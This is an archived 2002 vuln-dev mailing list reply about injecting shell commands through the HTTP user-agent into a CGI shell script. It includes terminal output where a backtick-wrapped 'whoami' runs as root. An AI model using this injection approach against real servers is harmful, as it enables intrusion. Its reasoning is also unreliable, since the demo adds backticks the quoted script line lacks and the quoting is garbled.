Vulnerability Development mailing list archives

Re: shell script cgi (summary?)

From: Brian Fury <brianfury () blueyonder co uk>
Date: Tue, 19 Nov 2002 06:40:28 +0000

On Mon, 18 Nov 2002, you wrote:
Thanks to everyone who replied regarding my attempts
to stuff shell commands into this line:

ua=`echo "$HTTP_USER_AGENT" | sed "s#\;##g"`

Obviously I can't speak authoratively here... I mean the ueber-skilled
team vuln-dev people who are payed to do this sort of thing may have
top-secret zero-day reasons why this might not work.... but hey it worked for
me.

[root@localhost lib]# export LAME=""whoami""""
[root@localhost lib]# `echo "$LAME" | sed "s#\;##g"`
root
[root@localhost lib]#

wh00pz - lookz like command execution to me

In case you didn't realise - it'z the ` and ` characters around the whole
expression that allowz uz command execution....

[root@localhost lib]# echo $LAME
whoami
[root@localhost lib]# `echo $LAME`
root
[root@localhost lib]#

BTW - it workz fine in a shell script.....

I'm sure somone has already mentioned this....

Best Regardz

Brian Fury

"You gonna feel the power of my move, you ready?"